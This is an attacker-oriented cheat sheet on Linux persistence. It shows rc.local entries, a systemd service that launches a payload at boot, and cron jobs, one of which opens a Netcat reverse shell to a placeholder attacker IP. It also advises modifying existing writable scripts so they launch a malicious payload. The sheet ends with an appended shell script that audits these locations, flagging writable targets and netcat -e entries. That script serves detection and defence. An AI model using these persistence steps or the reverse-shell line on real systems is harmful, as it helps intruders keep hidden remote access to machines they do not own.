Table Of Contents
- Linux Persistence
- rc.local
- Linux Service
- Crontab
- Poisoning Existing Scripts
LINUX PERSISTENCE
RC.LOCAL
Add the full path of the file to /etc/rc.local. The file at that path is executed on system startup.
nano /etc/rc.local
# or
echo "<FILE_PATH>" >> /etc/rc.local
LINUX SERVICE
Create or open a new service file with nano
nano /etc/systemd/system/<SERVICE_NAME>.service
Add the service definition to the file. <FILE_PATH> is the full path to the .sh file to execute on startup.
[Unit]
After=network.target
Description=My Service description
[Service]
Type=simple
Restart=always
ExecStart=<FILE_PATH>
[Install]
WantedBy=multi-user.target
Reload service manager
systemctl daemon-reload
Enable the service
systemctl enable <SERVICE_NAME>.service
Start the service
systemctl start <SERVICE_NAME>.service
CRONTAB
- More info at: https://crontab.guru/
Create a cron job that runs a Netcat reverse shell every day at midnight
# Open new crontab:
crontab -e
# Add the following line at the end:
0 0 * * * nc <ATTACKER_IP> <ATTACKER_PORT> -e /bin/sh
Create a cron job that runs a payload every day at midnight
# Open new crontab:
crontab -e
# Add the following line at the end:
0 0 * * * <FULLPATH>
POISONING EXISTING SCRIPTS
- Enumerate all persistence methods discussed in this section looking for existing persistence that has been created via script files such as .sh, .py, etc.
- If those are modifiable, modify them to launch a malicious uploaded payload.
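For the defender's side of this section, the following sketch (an added example, not part of the original cheat sheet) walks the same locations and lists what each one launches, flagging group- or world-writable targets and Netcat -e entries. The audit_persistence and report names, the optional root argument and the Debian-style /var/spool/cron/crontabs path are assumptions.

```sh
#!/bin/sh
# Added example: list what rc.local, systemd units and user crontabs launch.
# Output: source<TAB>flag<TAB>command. Flags: OK, NC_EXEC (netcat with -e),
# WRITABLE (target file is group- or world-writable; takes precedence).

report() {  # report ROOT SOURCE COMMAND (hypothetical helper)
    root=$1 src=$2 cmd=$3 flag=OK
    target=${cmd%% *}                       # first word of the command
    if printf '%s\n' "$cmd" | grep -Eq '(^|/)(nc|ncat|netcat)( .*)? -e '; then
        flag=NC_EXEC
    fi
    case $target in
        /*) if [ -f "$root$target" ]; then
                hit=$(find "$root$target" \( -perm -020 -o -perm -002 \) -print)
                [ -z "$hit" ] || flag=WRITABLE
            fi ;;
    esac
    printf '%s\t%s\t%s\n' "$src" "$flag" "$cmd"
}

audit_persistence() {  # audit_persistence [ROOT]; ROOT defaults to the live system
    root=${1:-}
    # rc.local: every non-blank, non-comment line except "exit" runs at boot
    if [ -f "$root/etc/rc.local" ]; then
        grep -Ev '^[[:space:]]*(#|$|exit( |$))' "$root/etc/rc.local" |
        while IFS= read -r line; do report "$root" rc.local "$line"; done
    fi
    # systemd: ExecStart= value with its optional prefix characters removed
    for unit in "$root"/etc/systemd/system/*.service; do
        [ -f "$unit" ] || continue
        sed -n 's/^ExecStart=[-@+!:]*//p' "$unit" |
        while IFS= read -r line; do report "$root" "${unit##*/}" "$line"; done
    done
    # user crontabs (Debian-style spool path, an assumption): drop comments,
    # then strip the five time fields or an @reboot-style keyword
    for tab in "$root"/var/spool/cron/crontabs/*; do
        [ -f "$tab" ] || continue
        grep -Ev '^[[:space:]]*#' "$tab" |
        sed -nE 's/^[[:space:]]*(@[a-z]+|([^[:space:]]+[[:space:]]+){4}[^[:space:]]+)[[:space:]]+//p' |
        while IFS= read -r line; do report "$root" "${tab##*/}" "$line"; done
    done
}
```

Run audit_persistence as root with no argument to check the live system, or pass a mounted image's root directory to audit it offline.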